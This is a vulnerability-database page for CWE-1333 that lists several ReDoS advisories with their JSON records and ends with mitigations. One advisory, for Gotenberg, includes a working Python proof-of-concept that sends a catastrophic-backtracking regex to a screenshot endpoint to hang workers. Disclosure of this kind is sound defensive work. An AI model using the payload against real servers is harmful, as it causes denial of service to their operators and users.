CWE-1333
AllowedInefficient Regular Expression Complexity
Abstraction: Base · Status: Draft
The product uses a regular expression with a worst-case computational complexity that is inefficient and possibly exponential.
724 vulnerabilities reference this CWE, most recent first.
GHSA-FG7X-G82R-94QC
Vulnerability from github – Published: 2023-03-31 06:30 – Updated: 2025-11-04 19:37A ReDoS issue was discovered in the Time component through 0.2.1 in Ruby through 3.2.1. The Time parser mishandles invalid URLs that have specific characters. It causes an increase in execution time for parsing strings to Time objects. The fixed versions are 0.1.1 and 0.2.2.
{
"affected": [
{
"package": {
"ecosystem": "RubyGems",
"name": "time"
},
"ranges": [
{
"events": [
{
"introduced": "0.2.0"
},
{
"fixed": "0.2.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "time"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.1.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-28756"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": true,
"github_reviewed_at": "2023-03-31T22:43:54Z",
"nvd_published_at": "2023-03-31T04:15:00Z",
"severity": "HIGH"
},
"details": "A ReDoS issue was discovered in the Time component through 0.2.1 in Ruby through 3.2.1. The Time parser mishandles invalid URLs that have specific characters. It causes an increase in execution time for parsing strings to Time objects. The fixed versions are 0.1.1 and 0.2.2.",
"id": "GHSA-fg7x-g82r-94qc",
"modified": "2025-11-04T19:37:42Z",
"published": "2023-03-31T06:30:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28756"
},
{
"type": "WEB",
"url": "https://www.ruby-lang.org/en/news/2023/03/30/redos-in-time-cve-2023-28756"
},
{
"type": "WEB",
"url": "https://www.ruby-lang.org/en/news/2022/12/25/ruby-3-2-0-released"
},
{
"type": "WEB",
"url": "https://www.ruby-lang.org/en/downloads/releases"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20230526-0004"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/202401-27"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WMIOPLBAAM3FEQNAXA2L7BDKOGSVUT5Z"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/G76GZG3RAGYF4P75YY7J7TGYAU7Z5E2T"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FFZANOQA4RYX7XCB42OO3P24DQKWHEKA"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WMIOPLBAAM3FEQNAXA2L7BDKOGSVUT5Z"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/G76GZG3RAGYF4P75YY7J7TGYAU7Z5E2T"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FFZANOQA4RYX7XCB42OO3P24DQKWHEKA"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00000.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2023/04/msg00033.html"
},
{
"type": "WEB",
"url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/time/CVE-2023-28756.yml"
},
{
"type": "WEB",
"url": "https://github.com/ruby/time/releases"
},
{
"type": "PACKAGE",
"url": "https://github.com/ruby/time"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Ruby Time component ReDoS issue"
}
GHSA-FHG7-M89Q-25R3
Vulnerability from github – Published: 2023-01-24 15:36 – Updated: 2025-10-17 16:52Description:
A regular expression denial of service (ReDoS) vulnerability has been discovered in ua-parser-js.
Impact:
This vulnerability bypass the library's MAX_LENGTH input limit prevention. By crafting a very-very-long user-agent string with specific pattern, an attacker can turn the script to get stuck processing for a very long time which results in a denial of service (DoS) condition.
Affected Versions:
From version 0.7.30 to before versions 0.7.33 / 1.0.33.
Patches:
A patch has been released to remove the vulnerable regular expression, update to version 0.7.33 / 1.0.33 or later.
References:
Regular expression Denial of Service - ReDoS
Credits:
Thanks to @Snyk who first reported the issue.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "ua-parser-js"
},
"ranges": [
{
"events": [
{
"introduced": "0.7.30"
},
{
"fixed": "0.7.33"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "ua-parser-js"
},
"ranges": [
{
"events": [
{
"introduced": "0.8.0"
},
{
"fixed": "1.0.33"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-25927"
],
"database_specific": {
"cwe_ids": [
"CWE-1333",
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2023-01-24T15:36:32Z",
"nvd_published_at": "2023-01-26T21:15:00Z",
"severity": "HIGH"
},
"details": "### Description:\nA regular expression denial of service (ReDoS) vulnerability has been discovered in `ua-parser-js`.\n\n### Impact:\nThis vulnerability bypass the library\u0027s `MAX_LENGTH` input limit prevention. By crafting a very-very-long user-agent string with specific pattern, an attacker can turn the script to get stuck processing for a very long time which results in a denial of service (DoS) condition.\n\n### Affected Versions:\nFrom version `0.7.30` to before versions `0.7.33` / `1.0.33`.\n\n### Patches:\nA patch has been released to remove the vulnerable regular expression, update to version `0.7.33` / `1.0.33` or later.\n\n### References:\n[Regular expression Denial of Service - ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n\n### Credits:\nThanks to @Snyk who first reported the issue.",
"id": "GHSA-fhg7-m89q-25r3",
"modified": "2025-10-17T16:52:22Z",
"published": "2023-01-24T15:36:32Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/faisalman/ua-parser-js/security/advisories/GHSA-fhg7-m89q-25r3"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25927"
},
{
"type": "WEB",
"url": "https://github.com/faisalman/ua-parser-js/commit/a6140a17dd0300a35cfc9cff999545f267889411"
},
{
"type": "PACKAGE",
"url": "https://github.com/faisalman/ua-parser-js"
},
{
"type": "WEB",
"url": "https://security.snyk.io/vuln/SNYK-JS-UAPARSERJS-3244450"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "ReDoS Vulnerability in ua-parser-js version"
}
GHSA-FJ7X-Q9J7-G6Q6
Vulnerability from github – Published: 2024-03-19 06:30 – Updated: 2024-03-20 15:24Versions of the package black before 24.3.0 are vulnerable to Regular Expression Denial of Service (ReDoS) via the lines_with_leading_tabs_expanded function in the strings.py file. An attacker could exploit this vulnerability by crafting a malicious input that causes a denial of service.
Exploiting this vulnerability is possible when running Black on untrusted input, or if you habitually put thousands of leading tab characters in your docstrings.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "black"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "24.3.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-21503"
],
"database_specific": {
"cwe_ids": [
"CWE-1333",
"CWE-75"
],
"github_reviewed": true,
"github_reviewed_at": "2024-03-20T15:24:01Z",
"nvd_published_at": "2024-03-19T05:15:09Z",
"severity": "MODERATE"
},
"details": "Versions of the package black before 24.3.0 are vulnerable to Regular Expression Denial of Service (ReDoS) via the lines_with_leading_tabs_expanded function in the strings.py file. An attacker could exploit this vulnerability by crafting a malicious input that causes a denial of service.\n\nExploiting this vulnerability is possible when running Black on untrusted input, or if you habitually put thousands of leading tab characters in your docstrings.",
"id": "GHSA-fj7x-q9j7-g6q6",
"modified": "2024-03-20T15:24:01Z",
"published": "2024-03-19T06:30:52Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21503"
},
{
"type": "WEB",
"url": "https://github.com/psf/black/commit/f00093672628d212b8965a8993cee8bedf5fe9b8"
},
{
"type": "PACKAGE",
"url": "https://github.com/psf/black"
},
{
"type": "WEB",
"url": "https://github.com/psf/black/releases/tag/24.3.0"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/black/PYSEC-2024-48.yaml"
},
{
"type": "WEB",
"url": "https://security.snyk.io/vuln/SNYK-PYTHON-BLACK-6256273"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "Black vulnerable to Regular Expression Denial of Service (ReDoS)"
}
GHSA-FMWG-QCQH-M992
Vulnerability from github – Published: 2026-04-07 18:16 – Updated: 2026-04-07 18:16Summary
Gotenberg uses dlclark/regexp2 to compile user-supplied scope patterns without setting a proper timeout. Users with access to features using this logic can hang workers indefinitely.
Details
Gotenberg uses dlclark/regexp2 to compile user-supplied scope patterns (gotenberg/pkg/modules/chromium/routes.go:200) with no MatchTimeout set, therefore using the default of math.MaxInt64 = "forever".
For example, any user with access to the endpoint /forms/chromium/screenshot/url can add a crafted scope pattern to the extraHttpHeaders form field using a nested quantifiers that causes infinite backtracking, hanging the Gotenberg worker indefinitely.
See the dlclark/regexp2 README.md for further considerations.
Tested on the latest container version gotenberg/gotenberg:8.29.1
PoC
The following Python script uses the /forms/chromium/screenshot/url endpoint, testing for differences in responses times between simple and malicious regexes.
#!/usr/bin/env -S uv run --script
# /// script
# requires-python = ">=3.12"
# dependencies = [
# "requests",
# ]
# ///
import json
import time
import requests
HOST = "localhost:3000"
# HOST = "gotenberg.local:3000"
def send_request(host: str, headers_dict: dict, label: str, timeout: int = 30):
"""Send a screenshot request to Gotenberg and measure response time."""
url = f"http://{host}/forms/chromium/screenshot/url"
print(f"\n[*] {label}")
print(f" extraHttpHeaders: {json.dumps(headers_dict)}")
start = time.time()
try:
r = requests.post(
url,
data={
"url": "http://api.service:3000/snapshot/",
"extraHttpHeaders": json.dumps(headers_dict),
},
files={"a": "b"},
timeout=timeout,
)
elapsed = time.time() - start
print(f" Status: {r.status_code}, Size: {len(r.content)}, Time: {elapsed:.2f}s")
except requests.exceptions.Timeout:
elapsed = time.time() - start
print(f" TIMEOUT after {elapsed:.2f}s — Gotenberg worker is hung (ReDoS confirmed)")
except requests.exceptions.ConnectionError as e:
elapsed = time.time() - start
print(f" CONNECTION ERROR after {elapsed:.2f}s: {e}")
def main():
# --- Test 1: Baseline ---
send_request(HOST, {"X-Test": "baseline"}, "Baseline: no scope")
# --- Test 2: Simple scope ---
send_request(HOST, {"X-Test": "value; scope=.*"}, "Simple scope: '.*'")
# --- Test 3: ReDoS scope ---
# Classic evil pattern: nested quantifiers on overlapping character class.
evil_pattern = r"([a-zA-Z0-9.:/_]+)+\!"
send_request(
HOST,
{"X-Test": f"value; scope={evil_pattern}"},
f"ReDoS scope: '{evil_pattern}'",
timeout=15,
)
if __name__ == "__main__":
main()
Impact
This is a ReDoS vulnerability which only impacts the availability of the service and/or server on which gotenberg is running. All instances where attackers can reach the /forms/chromium/screenshot/url endpoint specifing the extraHttpHeaders field are affected.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 8.29.1"
},
"package": {
"ecosystem": "Go",
"name": "github.com/gotenberg/gotenberg/v8"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "8.30.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-35458"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-07T18:16:19Z",
"nvd_published_at": "2026-04-07T15:17:43Z",
"severity": "HIGH"
},
"details": "### Summary\nGotenberg uses `dlclark/regexp2` to compile user-supplied scope patterns without setting a proper timeout. Users with access to features using this logic can hang workers indefinitely. \n\n### Details\nGotenberg uses `dlclark/regexp2` to compile user-supplied scope patterns (gotenberg/pkg/modules/chromium/routes.go:200) with no MatchTimeout set, therefore using the default of math.MaxInt64 = \"forever\".\n\nFor example, any user with access to the endpoint `/forms/chromium/screenshot/url` can add a crafted scope pattern to the `extraHttpHeaders` form field using a nested quantifiers that causes infinite backtracking, hanging the Gotenberg worker indefinitely.\n\nSee the [dlclark/regexp2 README.md](https://github.com/dlclark/regexp2?tab=readme-ov-file#catastrophic-backtracking-and-timeouts) for further considerations.\n\nTested on the latest container version gotenberg/gotenberg:8.29.1\n\n### PoC\n\nThe following Python script uses the `/forms/chromium/screenshot/url` endpoint, testing for differences in responses times between simple and malicious regexes.\n\n```python\n#!/usr/bin/env -S uv run --script\n# /// script\n# requires-python = \"\u003e=3.12\"\n# dependencies = [\n# \"requests\",\n# ]\n# ///\nimport json\nimport time\nimport requests\n\nHOST = \"localhost:3000\"\n# HOST = \"gotenberg.local:3000\"\n\ndef send_request(host: str, headers_dict: dict, label: str, timeout: int = 30):\n \"\"\"Send a screenshot request to Gotenberg and measure response time.\"\"\"\n url = f\"http://{host}/forms/chromium/screenshot/url\"\n print(f\"\\n[*] {label}\")\n print(f\" extraHttpHeaders: {json.dumps(headers_dict)}\")\n\n start = time.time()\n try:\n r = requests.post(\n url,\n data={\n \"url\": \"http://api.service:3000/snapshot/\",\n \"extraHttpHeaders\": json.dumps(headers_dict),\n },\n files={\"a\": \"b\"},\n timeout=timeout,\n )\n elapsed = time.time() - start\n print(f\" Status: {r.status_code}, Size: {len(r.content)}, Time: {elapsed:.2f}s\")\n except requests.exceptions.Timeout:\n elapsed = time.time() - start\n print(f\" TIMEOUT after {elapsed:.2f}s \u2014 Gotenberg worker is hung (ReDoS confirmed)\")\n except requests.exceptions.ConnectionError as e:\n elapsed = time.time() - start\n print(f\" CONNECTION ERROR after {elapsed:.2f}s: {e}\")\n\n\ndef main():\n # --- Test 1: Baseline ---\n send_request(HOST, {\"X-Test\": \"baseline\"}, \"Baseline: no scope\")\n\n # --- Test 2: Simple scope ---\n send_request(HOST, {\"X-Test\": \"value; scope=.*\"}, \"Simple scope: \u0027.*\u0027\")\n\n # --- Test 3: ReDoS scope ---\n # Classic evil pattern: nested quantifiers on overlapping character class.\n evil_pattern = r\"([a-zA-Z0-9.:/_]+)+\\!\"\n send_request(\n HOST,\n {\"X-Test\": f\"value; scope={evil_pattern}\"},\n f\"ReDoS scope: \u0027{evil_pattern}\u0027\",\n timeout=15,\n )\n\n\nif __name__ == \"__main__\":\n main()\n```\n\n### Impact\n\nThis is a ReDoS vulnerability which only impacts the availability of the service and/or server on which gotenberg is running. All instances where attackers can reach the `/forms/chromium/screenshot/url` endpoint specifing the `extraHttpHeaders` field are affected.",
"id": "GHSA-fmwg-qcqh-m992",
"modified": "2026-04-07T18:16:19Z",
"published": "2026-04-07T18:16:19Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-fmwg-qcqh-m992"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35458"
},
{
"type": "WEB",
"url": "https://github.com/gotenberg/gotenberg/commit/cfb48d9af48cb236244eabe5c67fe1d30fb3fe25"
},
{
"type": "PACKAGE",
"url": "https://github.com/gotenberg/gotenberg"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Gotenberg Vulnerable to ReDoS via extraHttpHeaders scope feature"
}
GHSA-FP36-299X-PWMW
Vulnerability from github – Published: 2022-06-03 00:01 – Updated: 2022-06-14 20:02An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the devcert npm package, when an attacker is able to supply arbitrary input to the certificateFor method
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "devcert"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.2.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-1929"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": true,
"github_reviewed_at": "2022-06-03T22:27:34Z",
"nvd_published_at": "2022-06-02T14:15:00Z",
"severity": "HIGH"
},
"details": "An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the devcert npm package, when an attacker is able to supply arbitrary input to the certificateFor method",
"id": "GHSA-fp36-299x-pwmw",
"modified": "2022-06-14T20:02:53Z",
"published": "2022-06-03T00:01:01Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1929"
},
{
"type": "WEB",
"url": "https://github.com/davewasmer/devcert/commit/b0763215f6683271d296fda98f7ef7bcd4a55977"
},
{
"type": "PACKAGE",
"url": "https://github.com/davewasmer/devcert"
},
{
"type": "WEB",
"url": "https://research.jfrog.com/vulnerabilities/devcert-redos-xray-211352"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Regular expression denial of service in devcert"
}
GHSA-FPWR-67PX-3QHX
Vulnerability from github – Published: 2025-04-29 12:30 – Updated: 2025-08-04 15:27A Regular Expression Denial of Service (ReDoS) vulnerability was identified in the huggingface/transformers library, specifically in the file tokenization_gpt_neox_japanese.py of the GPT-NeoX-Japanese model. The vulnerability occurs in the SubWordJapaneseTokenizer class, where regular expressions process specially crafted inputs. The issue stems from a regex exhibiting exponential complexity under certain conditions, leading to excessive backtracking. This can result in high CPU usage and potential application downtime, effectively creating a Denial of Service (DoS) scenario. The affected version is v4.48.1 (latest).
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "transformers"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.50.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-1194"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": true,
"github_reviewed_at": "2025-04-29T15:17:03Z",
"nvd_published_at": "2025-04-29T12:15:31Z",
"severity": "MODERATE"
},
"details": "A Regular Expression Denial of Service (ReDoS) vulnerability was identified in the huggingface/transformers library, specifically in the file `tokenization_gpt_neox_japanese.py` of the GPT-NeoX-Japanese model. The vulnerability occurs in the SubWordJapaneseTokenizer class, where regular expressions process specially crafted inputs. The issue stems from a regex exhibiting exponential complexity under certain conditions, leading to excessive backtracking. This can result in high CPU usage and potential application downtime, effectively creating a Denial of Service (DoS) scenario. The affected version is v4.48.1 (latest).",
"id": "GHSA-fpwr-67px-3qhx",
"modified": "2025-08-04T15:27:20Z",
"published": "2025-04-29T12:30:21Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1194"
},
{
"type": "WEB",
"url": "https://github.com/huggingface/transformers/commit/92c5ca9dd70de3ade2af2eb835c96215cc50e815"
},
{
"type": "PACKAGE",
"url": "https://github.com/huggingface/transformers"
},
{
"type": "WEB",
"url": "https://huntr.com/bounties/86f58dcd-683f-4adc-a735-849f51e9abb2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "Transformers Regular Expression Denial of Service (ReDoS) vulnerability"
}
GHSA-FQHP-RHM6-8RRJ
Vulnerability from github – Published: 2023-06-21 21:30 – Updated: 2025-03-11 21:55Withdrawn Advisory
This advisory has been withdrawn because the security impact of the slow printing of URLs has been disputed. This link is maintained to preserve external references.
Original Description
The urlnorm crate through 0.1.4 for Rust allows Regular Expression Denial of Service (ReDos) via a crafted URL to lib.rs.
{
"affected": [
{
"package": {
"ecosystem": "crates.io",
"name": "urlnorm"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.1.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-33289"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": true,
"github_reviewed_at": "2023-06-21T21:58:09Z",
"nvd_published_at": "2023-06-21T20:15:10Z",
"severity": "HIGH"
},
"details": "## Withdrawn Advisory\nThis advisory has been withdrawn because the security impact of the slow printing of URLs has been disputed. This link is maintained to preserve external references.\n\n## Original Description\nThe urlnorm crate through 0.1.4 for Rust allows Regular Expression Denial of Service (ReDos) via a crafted URL to lib.rs.",
"id": "GHSA-fqhp-rhm6-8rrj",
"modified": "2025-03-11T21:55:14Z",
"published": "2023-06-21T21:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33289"
},
{
"type": "WEB",
"url": "https://gist.github.com/6en6ar/b118888dc739e8979038f24c8ac33611"
},
{
"type": "PACKAGE",
"url": "https://github.com/progscrape/urlnorm"
},
{
"type": "WEB",
"url": "https://lib.rs/crates/urlnorm"
},
{
"type": "WEB",
"url": "https://news.ycombinator.com/item?id=40435263"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Withdrawn Advisory: urlnorm vulnerable to Regular Expression Denial of Service",
"withdrawn": "2025-03-11T21:55:14Z"
}
GHSA-FRJF-28G7-3864
Vulnerability from github – Published: 2023-12-21 03:30 – Updated: 2023-12-29 03:30An issue was discovered in Heimdal Thor agent versions 3.4.2 and before 3.7.0 on Windows, allows attackers to bypass USB access restrictions, execute arbitrary code, and obtain sensitive information via Next-Gen Antivirus component.
{
"affected": [],
"aliases": [
"CVE-2023-29486"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-12-21T01:15:32Z",
"severity": "CRITICAL"
},
"details": "An issue was discovered in Heimdal Thor agent versions 3.4.2 and before 3.7.0 on Windows, allows attackers to bypass USB access restrictions, execute arbitrary code, and obtain sensitive information via Next-Gen Antivirus component.",
"id": "GHSA-frjf-28g7-3864",
"modified": "2023-12-29T03:30:28Z",
"published": "2023-12-21T03:30:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-29486"
},
{
"type": "WEB",
"url": "https://medium.com/%40drabek.a/weaknesses-in-heimdal-thors-line-of-products-9d0e5095fb93"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FVFC-VFG9-G345
Vulnerability from github – Published: 2024-09-02 18:31 – Updated: 2024-09-02 18:31A vulnerability has been found in Secure Systems Engineering Connaisseur up to 3.3.0 and classified as problematic. This vulnerability affects unknown code of the file connaisseur/res/targets_schema.json of the component Delegation Name Handler. The manipulation leads to inefficient regular expression complexity. The complexity of an attack is rather high. The exploitation appears to be difficult. Upgrading to version 3.3.1 is able to address this issue. The name of the patch is 524b73ff7306707f6d3a4d1e86401479bca91b02. It is recommended to upgrade the affected component.
{
"affected": [],
"aliases": [
"CVE-2023-7279"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-09-02T18:15:21Z",
"severity": "LOW"
},
"details": "A vulnerability has been found in Secure Systems Engineering Connaisseur up to 3.3.0 and classified as problematic. This vulnerability affects unknown code of the file connaisseur/res/targets_schema.json of the component Delegation Name Handler. The manipulation leads to inefficient regular expression complexity. The complexity of an attack is rather high. The exploitation appears to be difficult. Upgrading to version 3.3.1 is able to address this issue. The name of the patch is 524b73ff7306707f6d3a4d1e86401479bca91b02. It is recommended to upgrade the affected component.",
"id": "GHSA-fvfc-vfg9-g345",
"modified": "2024-09-02T18:31:24Z",
"published": "2024-09-02T18:31:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7279"
},
{
"type": "WEB",
"url": "https://github.com/sse-secure-systems/connaisseur/pull/1407"
},
{
"type": "WEB",
"url": "https://github.com/sse-secure-systems/connaisseur/commit/524b73ff7306707f6d3a4d1e86401479bca91b02"
},
{
"type": "WEB",
"url": "https://github.com/sse-secure-systems/connaisseur/releases/tag/v3.3.1"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.276268"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.276268"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:A/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-FW2V-V7VP-PCCQ
Vulnerability from github – Published: 2024-10-26 21:30 – Updated: 2024-10-26 21:30Validate.js provides a declarative way of validating javascript objects. All versions as of 30 November 2020 contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). As of time of publication, it is unknown if any patches are available.
{
"affected": [],
"aliases": [
"CVE-2020-26310"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-26T21:15:14Z",
"severity": "HIGH"
},
"details": "Validate.js provides a declarative way of validating javascript objects. All versions as of 30 November 2020 contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). As of time of publication, it is unknown if any patches are available.",
"id": "GHSA-fw2v-v7vp-pccq",
"modified": "2024-10-26T21:30:46Z",
"published": "2024-10-26T21:30:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26310"
},
{
"type": "WEB",
"url": "https://github.com/blowsie/Pure-JavaScript-HTML5-Parser/issues/14"
},
{
"type": "ADVISORY",
"url": "https://securitylab.github.com/advisories/GHSL-2020-305-redos-Pure-JavaScript-HTML5-Parser"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:Green",
"type": "CVSS_V4"
}
]
}
Mitigation
Use regular expressions that do not support backtracking, e.g. by removing nested quantifiers.
Mitigation
Set backtracking limits in the configuration of the regular expression implementation, such as PHP's pcre.backtrack_limit. Also consider limits on execution time for the process.
Mitigation
Do not use regular expressions with untrusted input. If regular expressions must be used, avoid using backtracking in the expression.
Mitigation
Limit the length of the input that the regular expression will process.
CAPEC-492: Regular Expression Exponential Blowup
An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.